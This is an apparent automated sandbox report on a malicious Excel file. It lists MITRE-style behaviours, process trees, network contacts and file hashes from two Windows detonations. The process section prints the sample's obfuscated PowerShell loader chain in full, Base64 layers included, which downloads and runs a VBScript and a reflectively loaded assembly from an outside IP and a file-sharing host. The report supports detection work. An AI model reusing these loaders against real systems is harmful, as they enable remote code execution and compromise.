Malware Analysis Report

2024-12-07 16:58

Sample ID 241113-ct965avdkg
Target 544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls
SHA256 544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a
Tags
defense_evasion discovery execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a

Threat Level: Known bad

The file 544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery execution

Process spawned unexpected child process

Evasion via Device Credential Deployment

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Uses Volume Shadow Copy WMI provider

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 02:23

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 02:23

Reported

2024-11-13 02:25

Platform

win7-20240903-en

Max time kernel

140s

Max time network

141s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2596 wrote to memory of 2144 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 2596 wrote to memory of 2144 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 2596 wrote to memory of 2144 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 2596 wrote to memory of 2144 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE
PID 2144 wrote to memory of 1696 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2144 wrote to memory of 1696 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2144 wrote to memory of 1696 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2144 wrote to memory of 1696 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2144 wrote to memory of 1508 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2144 wrote to memory of 1508 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2144 wrote to memory of 1508 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2144 wrote to memory of 1508 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1508 wrote to memory of 2880 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1508 wrote to memory of 2880 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1508 wrote to memory of 2880 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1508 wrote to memory of 2880 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2144 wrote to memory of 2092 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WScript.exe
PID 2144 wrote to memory of 2092 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WScript.exe
PID 2144 wrote to memory of 2092 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WScript.exe
PID 2144 wrote to memory of 2092 N/A C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE C:\Windows\SysWOW64\WScript.exe
PID 2092 wrote to memory of 1856 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2092 wrote to memory of 1856 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2092 wrote to memory of 1856 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2092 wrote to memory of 1856 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1856 wrote to memory of 1888 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1856 wrote to memory of 1888 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1856 wrote to memory of 1888 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1856 wrote to memory of 1888 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE

"C:\Windows\SysTeM32\winDoWSPOWErShELL\v1.0\pOWeRSheLl.EXE" "powersheLL.Exe -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe ; IEx($(IEX('[SySTem.tEXT.eNcodINg]'+[cHAR]58+[cHar]58+'UTf8.gEtSTrinG([SYSTEm.CONvErt]'+[ChAR]0X3A+[cHar]58+'FrOmbaSe64sTrINg('+[chaR]0X22+'JGQzV3JwICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJFckRlRmluaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJrdExTUVhZLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVYb1FHLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJIbGxGLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsb3hDeHF1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdXUik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkJaZ1NrT0N3ZnQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGpXYW1SYUx2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRkM1dycDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTY3L3hhbXBwL25jL3NlZXRoZWJlc3RvcHRpb25zdG91bmRlcnN0YW5kZmFzdHRoaW5nc3RvYmVnZXRiYWNrYmlzY3V0LnRJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXN0b3B0aW9uc3RvdW5kZXJzdGFuZGZhc3R0aGluZ3N0b2JlZ2V0LnZiUyIsMCwwKTtTdEFSdC1TbEVlUCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdG9wdGlvbnN0b3VuZGVyc3RhbmRmYXN0dGhpbmdzdG9iZWdldC52YlMi'+[ChAr]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -nOP -W 1 -c DEVicecreDENTIAldEpLOyMent.EXe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7jkvdvij.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES72C1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC72C0.tmp"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHZlcmJPc0VwcmVmZVJlbmNlLnRvc3RySW5nKClbMSwzXSsnWCctam9JTicnKSgoJ2ZRSGltYWdlVXJsID0gb0xsaHR0cHM6Ly8xMDE3LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT0yQWFfYldvOVJldTQ1dDcnKydCVTFrVmdzZDlwVDlwZ1NTbHZTdEdyblQnKydJQ2ZGaG1US2ozTEM2U1F0SWNPY19UMzV3JnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDk0NTE3NmEwOTA0ZiBvTGw7JysnZlFId2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0RQPVKFCZHEXDABsonhadorldlYkNsaWUnKyduJysndDtmUUhpbWFnZUJ5JysndGVzID0gZlFId2ViQ2xpZW50LkRvd24nKydsb2FkRGF0YShmUUhpbWEnKydnZVVybCk7ZlFIaW1hJysnZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZlFIaW1hZ2VCeXRlcyk7ZlFIc3RhcnRGbGFnID0gb0xsPDxCQVNFNjRfU1RBUlQ+Pm9MbDtmUUhlbmRGbGFnID0gb0xsPDxCJysnQVMnKydFNjRfRU5EJysnPj5vTGw7ZlFIc3RhcnRJbmRleCA9JysnIGZRSGknKydtYWdlVGV4dC5JbmRleE9mKGZRSHN0YXJ0RmxhZyk7ZlFIZW5kSW5kJysnZXggPSAnKydmUUhpbWFnZVRleHQuSW5kZXhPZihmUUhlbmRGbGFnKTtmUUhzdGFydEluZGV4IC1nZSAwIC1hbmQgZlEnKydIZW5kSW5kZXggLWd0IGZRSHN0YXJ0SW5kZXg7ZlFIc3RhcnRJbmRleCArPSBmUUhzdGFydEZsYWcuTGVuZ3RoO2ZRSGInKydhc2U2NExlbmd0aCA9IGZRSGVuJysnZEluZGV4IC0gZlFIcycrJ3RhcnRJbmRleDtmJysnUUhiYXNlNjRDb21tYW5kID0gZlFIaW1hZ2VUZXh0LlN1YnN0cmluZyhmUUhzdGFydEluJysnZGV4LCBmUUhiYXNlNjRMZW5ndGgpO2ZRSGJhc2U2NFJldmVyc2VkID0gRQPVKFCZHEXDABsonhadorWpvaW4gKGZRSGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAxaVEgRm9yRWFjaC1PYmplY3QgeyBmUUhfIH0pWy0xLi4tKGZRSGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07ZlFIY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhmUScrJ0hiYXNlNjRSZXZlcnNlZCk7ZlFIbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGZRSGNvbW1hbmQnKydCeXRlcyk7ZlFIdmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChvTGxWQUlvTGwpO2ZRSHZhaU1ldGhvZC5JbnZva2UoZlFIbnVsbCwgQChvTGx0eHQuQVNGRVNSVy9jbi9wcG1heC83NjEuODcxLjY0Ljg5MS8vOnB0dGhvTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGRlc2F0aXZhZG9vTGwsIG9MbGFzcG5ldF9jb21waWxlcm9MbCwgb0xsZGVzYXRpdmFkb29MbCwgb0xsZGVzYXRpdmFkb29MbCxvTGxkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsb0xsZGVzYXRpdmFkb29MbCxvTGwnKydkZXNhdGl2YWRvb0xsLG9MbGRlc2F0aXZhZG9vTGwsJysnb0xsMW9MbCxvTGxkZXNhdGl2YWRvb0xsKSk7JykuckVwTGFjRSgoW2NoYXJdMTExK1tjaGFyXTc2K1tjaGFyXTEwOCksW3NUUklOZ11bY2hhcl0zOSkuckVwTGFjRSgoW2NoYXJdNDkrW2NoYXJdMTA1K1tjaGFyXTgxKSxbc1RSSU5nXVtjaGFyXTEyNCkuckVwTGFjRSgnZlFIJywnJCcpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command

Network

Country Destination Domain Proto
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 2.23.210.75:80 r10.o.lencr.org tcp
US 198.46.178.167:80 198.46.178.167 tcp
KR 221.146.204.133:443 4t.gg tcp
US 198.46.178.167:80 198.46.178.167 tcp
US 198.46.178.167:80 198.46.178.167 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp

Files

memory/2756-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2756-1-0x000000007293D000-0x0000000072948000-memory.dmp

memory/2596-18-0x0000000002B40000-0x0000000002B42000-memory.dmp

memory/2756-19-0x0000000002EF0000-0x0000000002EF2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 3363ae10035fe2fde456741f86fa00c5
SHA1 cff599a5546fc982bb6c4c718e55b76ec99704d4
SHA256 3296de50e74299b03d980d4a7fb5e7af7003d5ac369f851fdc733adf4a27653e
SHA512 ab7f52274342da7991894aceb4d09dc47bc46559a9890cd2505a0e435dcb5dd6d089041e6462e00e12a2c1a9edf39988906ba88a15e96508ff27f8b59af280df

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1

MD5 8b44abc3c23b25928169906d92ea0912
SHA1 326439cb6e138b5176f52b536ebd23b54233ff0b
SHA256 ee6e5caa510830fbee7cb77e8f57cfbf0d9e401d06260776c0388a5aa66f0333
SHA512 f0b8ac1a85a6382aac10016a6ef6e23d61f6c3c0288b2129b173ed453c99f1bf6975a57c9a58913220b96a38581ec4d4ea926a319febc70831f6680d8258c33a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1

MD5 fca2d4075e78fd8330d5590ee560451b
SHA1 b7ab976b0f45facd4a29a6aded52515523cd756b
SHA256 9f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689
SHA512 f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a363d054afff07f9cfa92aa11934afd1
SHA1 8d5e98ead8975f3b33ec61b91f6e8999b3cdfefd
SHA256 b33051b1b39c83d9e45494e41e663c71538ffe771de709128dae044834e37fd2
SHA512 20e204a11c55d126e459cb5a499e5f09a4f8f3db7af35a2e00db27419d208c4c93189748df0f173c86a390174685dc26b912b90023d139a3285f9392134e1081

C:\Users\Admin\AppData\Local\Temp\Cab69EA.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AS91FDNI\seemybestpartaroundtheworldtogetmethingsfornewone[1].hta

MD5 fa26f1bca49d7fac5a0150c69f718b19
SHA1 d143c88ad2906d1a81c1f06c2d931d04970e0f9e
SHA256 fdfedc9927a45e7728387b3cc323023950295cb66c7273820bcf0d7d9e97d53c
SHA512 10b0b1c95b26d931857cce2011c6c8d7e40337a899419bdd3e8fd1f90ea8e6837c0dd5ff9f0a2ef5752c3bb2b618290772addf459d54bdf0fb8d036ec52614ec

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 4562dd9392e0782c75232e0f208f77d4
SHA1 19e7dca9afe5f4534cb2b49148fca0b605f0d296
SHA256 109825284f2431a3bdb5111e0e0771fda14dbf499ef8d76b985b174fa3e4a752
SHA512 28b13d82a9e2aa86834109e249c8547f832f84ee13bf762990aedcb2dd6d1b65a01faf7e2c720ebd5931393d16a365bdb17e2927ff743434d279030661cdf955

\??\c:\Users\Admin\AppData\Local\Temp\7jkvdvij.cmdline

MD5 2a771eeda925e16b98c954042c979e03
SHA1 e3d7c637edfc927b8a46bf54615cb2446a7dc1ba
SHA256 5fa24c9a79cb80a3af1b8df2e8e73ede312016ea0f06b03382e905ca38a8b94b
SHA512 0f9b5309ca52bd366e2c05407f60a9f17e29ca4b0e0e5203c665be889a200ec888929ec098ef61ec12cd8d56530e08234f2021ede89b18e85017f29e09b441b3

\??\c:\Users\Admin\AppData\Local\Temp\7jkvdvij.0.cs

MD5 0b9734ed54c4f41d0c94957b007eb3d5
SHA1 ebabbb2d826295a994ba691d921a4c7c5ed506d1
SHA256 36632527d6cce240e5833d6251632127fd95f085c35a3aa2a363be2f2cbc84fa
SHA512 d32ebc74674dd75c354a9b74324421a2a4af0a2d6feeb3735d3fab857fb488aaf8be88f4687299c614b6e70556b3980ba007ba02abb8e5e341a2cabccdd10b17

\??\c:\Users\Admin\AppData\Local\Temp\CSC72C0.tmp

MD5 8dbe73734f4a2b75f5eba53420b61a14
SHA1 f37c29f8eadd87d37a938f668aac12df3d8e12ef
SHA256 daf71138513da40ef458d07b333f16c2313792248394de423bd07d207827040e
SHA512 1f601f2f37120126396c45282de1078ecd3ba9cb962f6beb7c2327f4774ed84265f3a8e52a8dbcf88d32c1debdd96798765c56ce60079c01274e7686446883a1

C:\Users\Admin\AppData\Local\Temp\7jkvdvij.dll

MD5 3c3fbe0fbd3f248bcbf824d5bb2f1e95
SHA1 738f8569518b4183c61ebf06d0d662e31453bdc5
SHA256 4d83cd2efc973b57f70dec70cfcfa8e007b5242780d89f7d1260c3c19a2af210
SHA512 39e549c26c3c8aee7c37ff708244fd34143e901485cc0f247877494f147bedf81acba274b599687012b4cbc71de615c56b3f53de47515ddfb7b326a0c4f3c97e

C:\Users\Admin\AppData\Local\Temp\RES72C1.tmp

MD5 11ce1637cd240911c451d75c165273a2
SHA1 705c802e5b970d49ba073c05d348a4cf8f6a7d70
SHA256 2fe01115fac832b15d210fd303cb3fceabe741ac9b6bc200fb8eb675fbebff36
SHA512 a2710657f93a0efe9884f3907e55a9a1ffd145956e18553ab6bc2d6de2b4775cec5af0ed54d81cb6fb42cae183aed18a9efd14a1202450d471bdfbdf85847a2a

C:\Users\Admin\AppData\Local\Temp\7jkvdvij.pdb

MD5 eb2033527eada3f7ee82f018b00d6d86
SHA1 505c922b0ef134d7d9bb5b009d50f6e4263d7847
SHA256 c0d4f44f5ab16bd3a88d7a989d3cb32dba001a4550db2c4e753d6a7e6ef28f34
SHA512 fd733bc186b490a20b9b388fcd97ea733ca327df1f0a32763abaa455e7be58379500da7f437d99d3267b4913a310dc41d917b23d4617236f3f8d1ebdd5863aab

C:\Users\Admin\AppData\Roaming\seethebestoptionstounderstandfastthingstobeget.vbS

MD5 4f46597a54e903c400cac4db5a222ecb
SHA1 0a2f30da05a532bfbddaba3af235011d60db8fc8
SHA256 ba78e6d4f42b1aab53a731c9bd0820d2f0278170eb5ef92604f32e92cfcb8246
SHA512 ffac65a2a99fe7c3883bb82f5736dbcbcdd8e3d8cecd265fda76e7b7d07d266f1f0b11eaa3adcf714a7e50314d3e140e50799e5b52fe2494da05f504912f344a

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2756-77-0x000000007293D000-0x0000000072948000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 02:23

Reported

2024-11-13 02:25

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

133s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
